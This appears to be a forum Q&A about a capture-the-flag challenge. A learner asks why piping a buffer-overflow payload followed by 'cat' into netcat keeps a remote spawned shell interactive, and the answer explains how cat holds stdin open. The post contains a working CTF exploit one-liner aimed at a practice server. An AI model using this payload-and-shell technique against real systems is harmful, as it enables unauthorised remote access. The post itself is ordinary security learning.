# Why does "(echo <Payload> && cat) | nc <link> <port>" creates a persistent connection?

Tags: shell, cat, netcat, ctf

I began with playing ctfs challenges, and I encountered a problem where I needed to send an exploit into a binary and then interact with the spawned shell.
I found a solution to this problem which looks something like this:

```
(echo -ne "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000
```

Meaning:
without the "cat" sub-command, I couldn't interact with the shell, but with it, i now able to send commands into the spawned shell and get the returned output to my console stdout.

What exactly happens there? this command line confuses me

Answer (score 2, accepted):

If you just type in `cat` at the command line, you'll be able to see that this command simply copies `stdin` to `stdout` one line at a time. It will carry on doing this until you either quit with <kbd>Ctrl-C</kbd> or send an EOF with <kbd>Ctrl-D</kbd>.

In this example you're running `cat` immediately after successfully printing the payload (the concatenator `&&` tells the shell to run the second command only if the first command has an exit code of zero; i.e., no error). As a result, the remote terminal won't see an EOF until you terminate it as described above. When this is piped to `nc`, everything you type in is sent via `cat` to the remote server, and everything it sends back appears on your `stdout`.

So yes, in effect you end up with an interactive shell. You can get pretty much the same effect on your own machine by running `cat | sh`.